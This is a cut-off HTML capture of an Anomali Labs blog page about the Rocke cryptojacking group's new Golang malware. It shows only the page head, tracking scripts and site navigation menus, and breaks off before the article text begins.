CINXE.COM

<!DOCTYPE html><html data-wf-domain="www.anomali.com" data-wf-page="657dc50a96389eee4e83bf78" data-wf-site="6453db2ad32b573c40a15c49" lang="en" data-wf-collection="657dc50a96389eee4e83bee7" data-wf-item-slug="rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"><head><meta charset="utf-8"/><title>Rocke Evolves Its Arsenal With a New Malware Family Written in Golang | Anomali Labs</title><link rel="alternate" hrefLang="x-default" href="https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"/><link rel="alternate" hrefLang="en" href="https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"/><link rel="alternate" hrefLang="es" href="https://www.anomali.com/es/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"/><link rel="alternate" hrefLang="fr-FR" href="https://www.anomali.com/fr/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"/><link rel="alternate" hrefLang="it" href="https://www.anomali.com/it/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"/><meta content="The “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how they’re stealing your cycles." name="description"/><meta content="Rocke Evolves Its Arsenal With a New Malware Family Written in Golang | Anomali Labs" property="og:title"/><meta content="The “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how they’re stealing your cycles." property="og:description"/><meta content="https://cdn.prod.website-files.com/6454d31338f3f4b0b5ecdf5f/648e7040671682aaba4fe968_blog-rocke-group.webp" property="og:image"/><meta content="Rocke Evolves Its Arsenal With a New Malware Family Written in Golang | Anomali Labs" property="twitter:title"/><meta content="The “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how they’re stealing your cycles." property="twitter:description"/><meta content="https://cdn.prod.website-files.com/6454d31338f3f4b0b5ecdf5f/648e7040671682aaba4fe968_blog-rocke-group.webp" property="twitter:image"/><meta property="og:type" content="website"/><meta content="summary_large_image" name="twitter:card"/><meta content="width=device-width, initial-scale=1" name="viewport"/><meta content="AbDkbbWPyqedfw2IpMoUxxQjy11md95hgMXRldz1Q9c" name="google-site-verification"/><link href="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/css/anomali-staging.1a94ac33b.min.css" rel="stylesheet" type="text/css"/><link href="https://fonts.googleapis.com" rel="preconnect"/><link href="https://fonts.gstatic.com" rel="preconnect" crossorigin="anonymous"/><script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script><script type="text/javascript">WebFont.load({ google: { families: ["Oswald:200,300,400,500,600,700","Inter:100,200,300,regular,500,600,700,800,900"] }});</script><script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script><link href="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/6682c02e3d847e70d6631aee_Anomali-favicon-32x32-2024.png" rel="shortcut icon" type="image/x-icon"/><link href="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/6682c0369a0c90e7ab7b891c_Anomali-webclip-256x256-2024.png" rel="apple-touch-icon"/><link href="https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" rel="canonical"/> <script> window.dataLayer = window.dataLayer ||[]; function gtag(){dataLayer.push(arguments);} gtag('consent','default',{ 'ad_storage':'denied', 'analytics_storage':'denied', 'ad_user_data':'denied', 'ad_personalization':'denied', 'personalization_storage':'denied', 'functionality_storage':'granted', 'security_storage':'granted', 'wait_for_update': 500 }); gtag("set", "ads_data_redaction", true); </script>  <script src="https://cmp.osano.com/169utVU8UqaBo10ut/7ca9deb5-f1d5-4659-a2c1-a4fbef660f0c/osano.js"></script>  <script defer src="https://cdn.jsdelivr.net/npm/@finsweet/attributes-selectcustom@1/selectcustom.js"></script> <style> /* hide scrollbar but allow scrolling */ .navbar_lang-list .tablet-version { -ms-overflow-style: none; /* for Internet Explorer, Edge */ overflow-y: scroll; } .navbar_lang-list .tablet-version::-webkit-scrollbar { display: none; /* for Chrome, Safari, and Opera */ } </style>  <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-KWSG6VV');</script>   <script type="text/javascript"> (function() { var didInit = false; function initMunchkin() { if(didInit === false) { didInit = true; Munchkin.init('208-RDI-080'); } } var s = document.createElement('script'); s.type = 'text/javascript'; s.async = true; s.src = '//munchkin.marketo.net/munchkin.js'; s.onreadystatechange = function() { if (this.readyState == 'complete' || this.readyState == 'loaded') { initMunchkin(); } }; s.onload = initMunchkin; document.getElementsByTagName('head')[0].appendChild(s); })(); </script>  <script> document.addEventListener('DOMContentLoaded', function () { const tabs = document.querySelectorAll('[data-w-tab]'); // Prevent the dropdown from opening on hover when a tab is clicked function preventDropdownOnTabClick(event) { const dropdownToggle = event.target.closest('.w-dropdown-toggle'); dropdownToggle.removeAttribute('data-hover'); } // Add click event listener to each tab link tabs.forEach(tab => { tab.addEventListener('click', preventDropdownOnTabClick); }); // Reset dropdown state to normal when mouse leaves the menu item const dropdownItem = document.querySelector('.navbar2_menu-item'); dropdownItem.addEventListener('mouseleave', function () { dropdownItem.querySelector('.w-dropdown-toggle').setAttribute('data-hover', 'true'); }); }); </script> <style> .trd-comp-container { z-index: 9999; } </style> <style> .swiper-wrapper { height: auto !important; } </style> <style> .swiper-slide { height: auto !important; } </style> <script> // Check if the URL contains gclid parameter if (window.location.href.includes("gclid=")) { // Extract the value of gclid parameter from the URL var gclidValue = window.location.href.split("gclid=")[1].split("&")[0]; // Calculate expiration date for the cookie (365 days from now) var expirationDate = new Date(); expirationDate.setDate(expirationDate.getDate() + 365); // Format expiration date as required by document.cookie var expires = "expires=" + expirationDate.toUTCString(); // Store the value in a cookie named 'gclid' with 365 days expiration console.log("Storing gclid value in cookie:", gclidValue); document.cookie = "gclid=" + gclidValue + "; expires=" + expires + "; path=/"; /*/ Remove gclid parameter and its value from the URL var newUrl = window.location.href.split("?")[0]; // Reload the page without gclid parameter console.log("Reloading page without gclid parameter"); window.location.href = newUrl; */ } </script>  <script defer src="https://cdn.jsdelivr.net/npm/@finsweet/attributes-scrolldisable@1/scrolldisable.js"></script> <style> .mktoForm .mktoButtonRow { padding: 0 !important; border-radius: 0 !important; } .mktoForm button.mktoButton { padding: .875rem 1.25rem !important; background-image: linear-gradient(270deg, var(--medium-spring-green), #01e9fd) !important; } </style><link rel="stylesheet" href="https://xtlsm4.csb.app/blog.css"/>  <script type="text/javascript" src="https://platform-api.sharethis.com/js/sharethis.js#property=654d08d02398960013d901c4&product=inline-share-buttons&source=platform" async="async"></script> <script> document.addEventListener('DOMContentLoaded', (event) => { // Set this based on your CMS setting // Replace the true with your CMS chip in Webflow const noIndex = false; // true or false based on CMS // Check if noIndex is true if (noIndex) { // Create the meta tag var metaTag = document.createElement('meta'); metaTag.name = "robots"; metaTag.content = "noindex"; // Append the meta tag to the head document.head.appendChild(metaTag); } }); </script><script type="text/javascript">window.__WEBFLOW_CURRENCY_SETTINGS = {"currencyCode":"USD","symbol":"$","decimal":".","fractionDigits":2,"group":",","template":"{{wf {\"path\":\"symbol\",\"type\":\"PlainText\"} }} {{wf {\"path\":\"amount\",\"type\":\"CommercePrice\"} }} {{wf {\"path\":\"currencyCode\",\"type\":\"PlainText\"} }}","hideDecimalForWholeNumbers":false};</script></head><body><div class="page-wrapper"><header class="navbar_component tablet-version"><header class="navbar_component tablet-version"><div class="navbar3_top tablet-version is-new"><div class="navbar_mobile-top"><div class="padding-global"><div class="navbar_mobile-top_links"><a href="/blog" class="navbar_link topbar tablet-version border-bottom-none w-inline-block"><div class="navbar3_link-text">Blog</div></a><a href="/customer-success" class="navbar_link topbar tablet-version border-bottom-none w-inline-block"><div class="navbar3_link-text">Support</div></a></div></div></div><div class="navbar_desktop-top"><div class="padding-global no-padding-mobile"><div class="container-large"><div data-animation="default" class="navbar_mobile_new w-nav" data-easing2="ease" fs-scrolldisable-element="smart-nav" data-easing="ease" data-collapse="medium" data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c829" role="banner" data-duration="400"><div class="navbar_top_new hide-on-desktop"><div class="padding-global"><div class="navbar_top-wrapper navbar3 is-new"><div class="navbar_top-logo-wrapper"><a href="/" class="navbar_logo-link-top w-nav-brand"><img width="Auto" height="Auto" alt="" src="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/6615615b4e92d82289e9b0be_anomali%20logo%20white.svg" loading="lazy" class="navbar_logo is-new"/></a></div><div class="navbar_container"><div class="navbar_menu-button w-nav-button"><div class="menu-icon1"><div class="menu-icon1_line-top"></div><div class="menu-icon1_line-middle"><div class="menu-icon_line-middle-inner"></div></div><div class="menu-icon1_line-bottom"></div></div></div></div></div></div></div><nav role="navigation" class="new_navbar_menu w-nav-menu"><div><div class="container-large desktop-version"><div class="navbar_menu-wrapper tablet-version show-tablet"><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c83b" class="navbar_link topbar tablet-version is-new"><div class="navbar_link-text">PRODUCTS</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c83f" class="navbar_link topbar tablet-version is-new"><div class="navbar_link-text">Marketplace</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c843" class="navbar_link topbar tablet-version is-new"><div class="navbar_link-text">Resources</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c847" class="navbar_link topbar tablet-version is-new"><div class="navbar_link-text">Partners</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c84b" class="navbar_link topbar tablet-version is-new"><div class="navbar_link-text">Company</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div class="wg-element-wrapper sw6 tablet-version hide w-locales-list"><div data-delay="200" data-hover="false" class="navbar_lang-menu-dropdown last-item language tablet-version w-dropdown"><div id="lang-dropdown" class="navbar_lang-dropdown-toggle language-dropdown tablet-version w-dropdown-toggle"><div class="navbar_lang-link tablet-version">LANGUAGE</div><div class="navbar2_lang-arrow w-embed"><svg width="18" height="18" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div><nav class="navbar_lang-list tablet-version w-dropdown-list"><div class="navbar_lang-list-inside tablet-version"><div role="list" class="w-locales-items"><div role="listitem" class="w-locales-item"><a hreflang="en" href="/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" aria-current="page" class="navbar_lang-link text-size-regular tablet-version w--current">English</a></div><div role="listitem" class="w-locales-item"><a hreflang="es" href="/es/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" class="navbar_lang-link text-size-regular tablet-version">Español</a></div><div role="listitem" class="w-locales-item"><a hreflang="fr-FR" href="/fr/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" class="navbar_lang-link text-size-regular tablet-version">Français</a></div><div role="listitem" class="w-locales-item"><a hreflang="it" href="/it/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" class="navbar_lang-link text-size-regular tablet-version">Italiano</a></div></div><div class="hide w-form"><form id="email-form" name="email-form" data-name="Email Form" method="get" data-wf-page-id="657dc50a96389eee4e83bf78" data-wf-element-id="0c6e9625-048c-696f-e1ce-466d6ae2c85b"><select id="languageSelect" name="Language" data-name="Language" class="w-select"></select></form><div class="w-form-done"><div>Thank you! Your submission has been received!</div></div><div class="w-form-fail"><div>Oops! Something went wrong while submitting the form.</div></div></div></div></nav></div></div><div class="navbar_menu-buttons tablet-version"><div class="padding-global"><div class="button-group"><a href="/request-a-demo" class="button-v2 max-width-full text-align-center w-button">Schedule A Demo</a></div></div></div></div><div class="navbar_menu-wrapper tablet-version hide-tablet"><a href="/discover" class="navbar_link topbar tablet-version hide-desktop border-bottom-none w-inline-block"><div class="navbar_link-text">Discover</div></a><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c86f" class="navbar_link topbar tablet-version hide-desktop products border-bottom-none"><div class="navbar_link-text">PRODUCTS</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c873" class="navbar_link topbar tablet-version hide-desktop border-bottom-none marketplace"><div class="navbar_link-text">Marketplace</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c877" class="navbar_link topbar tablet-version hide-desktop border-bottom-none resources"><div class="navbar_link-text">Resources</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c87b" class="navbar_link topbar tablet-version hide-desktop border-bottom-none partners"><div class="navbar_link-text">Partners</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c87f" class="navbar_link topbar tablet-version hide-desktop border-bottom-none company"><div class="navbar_link-text">Company</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div class="navbar-mobile_divider hide-desktop"></div><a href="/blog" class="navbar_link topbar tablet-version border-bottom-none w-inline-block"><div class="navbar3_link-text">Blog</div></a><a href="/customer-success" class="navbar_link topbar tablet-version border-bottom-none w-inline-block"><div class="navbar3_link-text">Support</div></a></div></div></div><div class="navbar_link-content"><div class="navbar_link-products is-new"><div class="padding-global desktop-version tablet-version navlinks"><div class="container-large desktop-version"><div class="back-button-wrapper"><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c892" class="navbar_link-back products"><div class="back-button w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M10.8284 12.0007L15.7782 16.9504L14.364 18.3646L8 12.0007L14.364 5.63672L15.7782 7.05093L10.8284 12.0007Z" fill="rgba(0,0,0,1)"></path></svg></div><div class="text-size-small text-weight-medium">PRODUCTS</div></div></div><a href="/platform" class="new_nav_dropdown-full w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">The Anomali Platform</div><p class="text-size-small text-weight-normal">The industry-leading AI-Powered solution elevating your security operations and defense capabilities in one platform. We consolidate your tech stack; give you never before seen speed scale and performance at less cost, empower your team, and help retain them. Simply different.</p></div></a><div class="navbar_link-products-dropdowns"><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Security Automation</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/products/copilot" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Anomali Copilot<br/></div></div><p class="text-size-small text-weight-normal">Immediate, correlated insight: Search petabytes of data in seconds.<br/></p></div></a></div><a href="/products/integrator" class="navbar2_column-section-heading is-new hide w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Integrator</div></div><p class="text-size-small text-weight-normal">Automate response: Transform risk insights into real-time protections.</p></div></a></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Detection and Response</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/products/security-analytics" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Anomali Security Analytics<br/></div></div><p class="text-size-small text-weight-normal">Big data security analytics: Threat detection across all of your digital assets at a fraction of the cost.<br/></p></div></a></div></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Threat Intelligence Management</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/products/threatstream" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Anomali Threatstream<br/></div></div><p class="text-size-small text-weight-normal">The external landscape: From data to insights in minutes.<br/></p></div></a></div><a href="/products/anomali-intel-channels" class="navbar2_column-section-heading is-new hide w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Anomali Intelligence Channels</div></div><p class="text-size-small text-weight-normal">Your curated intelligence: Accelerate your time to protection.<br/></p></div></a></div></div></div></nav></div><a id="w-node-_0c6e9625-048c-696f-e1ce-466d6ae2c8e5-07e133ca" href="/siem-consolidation" class="button-v2 is-secondary is-navbar w-button">Navigating the siem storm?</a></div></div></div></div><div class="navbar_link-marketplace is-new"><div class="padding-global desktop-version tablet-version navlinks"><div class="container-large desktop-version"><div class="back-button-wrapper"><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c8eb" class="navbar_link-back products"><div class="back-button w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M10.8284 12.0007L15.7782 16.9504L14.364 18.3646L8 12.0007L14.364 5.63672L15.7782 7.05093L10.8284 12.0007Z" fill="rgba(0,0,0,1)"></path></svg></div><div class="text-size-small text-weight-medium">MARKETPLACE</div></div></div><a href="/platform" class="new_nav_dropdown-full w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">The Anomali Marketplace</div><p class="text-size-small text-weight-normal">A unique cybersecurity marketplace providing instant access to a growing catalog of threat intelligence providers, integration partners, and threat analysis tools.</p></div></a><div class="navbar_link-products-dropdowns"><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Marketplace Offerings</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/marketplace/threat-intelligence-feeds" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Threat Intelligence Feeds<br/></div></div><p class="text-size-small text-weight-normal">Trial and purchase threat intelligence feeds from Anomali partners – find the right intelligence for your organization, industry, geography, threat type, and more.</p></div></a></div><a href="/marketplace/threat-analysis-tools" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Threat Analysis Tools and Enrichments</div></div><p class="text-size-small text-weight-normal">Gain the tools to pivot quickly from one piece of information to look up other sources of data to get a complete picture of a threat – all one click away.</p></div></a></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">For Partners</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/marketplace/security-system-partners" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Security System Partners</div></div><p class="text-size-small text-weight-normal">Anomali seamlessly integrates with many Security and IT systems to operationalize threat intelligence cost.</p></div></a></div><a href="/marketplace" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Marketplace for Partners</div></div><p class="text-size-small text-weight-normal">The Anomali Technology Partner Program provides technology partners everything they need to develop innovative and differentiated product and service integrations that complement Anomali’s solution portfolio designed to stop breaches and attackers.</p></div></a></div></div></div></nav></div></div></div></div></div><div class="navbar_link-resources is-new"><div class="padding-global desktop-version tablet-version navlinks"><div class="container-large desktop-version"><div class="back-button-wrapper"><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c92b" class="navbar_link-back products"><div class="back-button w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M10.8284 12.0007L15.7782 16.9504L14.364 18.3646L8 12.0007L14.364 5.63672L15.7782 7.05093L10.8284 12.0007Z" fill="rgba(0,0,0,1)"></path></svg></div><div class="text-size-small text-weight-medium">RESOURCES</div></div></div><div class="new_nav_dropdown-full"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Libraries</div></div></div><a href="/resources" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-small text-weight-semibold">Resources</div><p class="text-size-small text-weight-normal">Upcoming and on-demand webinars, brochures and datasheets, industry reports and white papers, case studies, and more.</p></div></a><a href="/company/events" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-small text-weight-semibold">Events</div><p class="text-size-small text-weight-normal">Join Anomali for any of our online or in-person events throughout the year to learn how we can help you achieve your cyber security goals. We'd love to see you online or  in-person!</p></div></a><div class="navbar_link-products-dropdowns"><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Threat Intelligence</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/resources/what-is-threat-intelligence" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is Threat Intelligence?<br/></div></div></a></div><div class="margin-bottom margin-small"><a href="/resources/what-is-threat-intelligence" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Threat Intelligence Sharing<br/></div></div></a></div><div class="margin-bottom margin-small"><a href="/resources/what-is-a-tip" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is a Threat Intelligence Platform?</div></div></a></div><a href="/resources/what-is-a-cyber-fusion-center" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is a Cyber Fusion Center?</div></div></a></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Security Analytics</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/resources/what-is-security-analytics" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is Security Analytics?<br/></div></div></a></div><div class="margin-bottom margin-small"><a href="/resources/what-is-soar" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is SOAR?<br/></div></div></a></div><div class="margin-bottom margin-small"><a href="/resources/understanding-threat-exposure-management" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is Threat Exposure Management?<br/></div></div></a></div><div class="margin-bottom margin-small"><a href="/resources/what-is-threat-detection-investigation-and-response" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is Threat Detection, Investigation, and Response?</div></div></a></div><a href="/resources/evolution-future-of-siem" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">The Evolution and Future of SIEM<br/></div></div></a></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Security Frameworks</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" 